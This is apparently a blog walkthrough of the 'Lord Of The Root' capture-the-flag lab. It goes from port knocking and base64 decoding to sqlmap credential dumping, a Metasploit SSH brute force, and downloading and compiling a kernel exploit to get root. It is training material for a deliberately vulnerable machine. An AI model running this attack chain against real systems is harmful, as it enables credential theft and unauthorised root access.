Lord Of The Root: 1.0.1

How about taking a look on Port Knocking?
Let’s see how we can knock ports in this CTF !!


Lab Environment


Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux


Vulnerable Machine : Lord Of The Root: 1.0.1


Now let’s scan our local network to which attacking machine and the vulnerable machine is connected. 
Syntax used: arp-scan --local
Victim machine: 192.168.59.135




Performing the enumeration of ports and services using nmap.


Syntax Used: nmap -A 192.168.59.135 -Pn 
Results: Port 22 is open and ssh service is active.




Tried connecting to ssh and got some hint to knock ports 1,2,3
Syntax Used: ssh 192.168.59.135




Now performing port scanning again as given in the hint.
Syntax Used: nmap -r -p1,2,3 -A 192.168.59.135 -Pn




Now, again performing the nmap scan to see if something happened or if we can get the new results.
Syntax Used: nmap -p- -A 192.168.59.135 -Pn 
Results: http service is active on port 80




Tried to browse the IP as http service is active.




Now usual approach again!! Browsing robots.txt




A usual habit to view source code of every page.
This time it helped me and gave me base64 encoded string.




Decoding the base64 string with terminal.
Syntax Used: echo”encoded string” | base64 -d
And again got another base64 encoded string.




Decoding another string which we got after decoding the first one.
Results: /978345210/index.php




Now browsing the url with above path.
Boom!! Got login panel(which can be entry point).
Tried few things like auth bypass etc. but nothing proved to be successful.




Stuck, But sqlmap helped me.
Attacking forms with sqlmap and extracted databases.
Syntax Used: sqlmap -u “url/index.php” --forms --dbs --batch




Extracted all the details of all the databases but only Webapp was containing something useful.
Now, it’s time to extract the tables of Webapp.
Syntax Used: sqlmap -u “url/index.php” --forms -D Webapp --tables --batch
Results: Users table was present.




Dumping all the details of Users.
Syntax Used: sqlmap -u “url/index.php” --forms -D Webapp --tables --dump-all --batch
Copying usernames obtained in users.txt file and passwords obtained in pass.txt file.
Planning to brute force the ssh login with ssh auxiliary.


Firing up msfconsole from the terminal and using ssh login auxiliary to brute force the ssh login.
Providing the necessary details needed as shown.
Sorry guys I messed up with the things.
I missed one i.e set rhosts I.P of a victim.
Finally, typing exploit will run the auxiliary with provided users and pass files.
Results: command shell opened when our brute force is successful.




Want to know active sessions.
Type sessions -i
One session is opened, having ID “1”
To access that:
Syntax Used: sessions -i 1




Spawning the shell.
Syntax Used: python -c’import pty; pty.spawn(“/bin/sh”)’
And enumerating the kernel version to escalate privileges.
Syntax Used: uname -a




Downloading the suitable exploit in temp directory of a machine using wget utility.
Syntax Used: wget Download link address.
Results: exploit is downloaded named 39166




Changing name of 39166 to paras.c.
Syntax Used: mv 39166 paras.c




Now compiling paras.c file using gcc compiler.
Syntax Used: gcc paras.c -o paras




Executing the file named paras.
Syntax Used: ./paras
Results: gained root.




Reading the Flag.txt in the root directory.










Popular posts from this blog

Calculat3 M3 | CTF Learn

TryHackme: Blue Walkthrough

HackTheBox-Traceback Walkthrough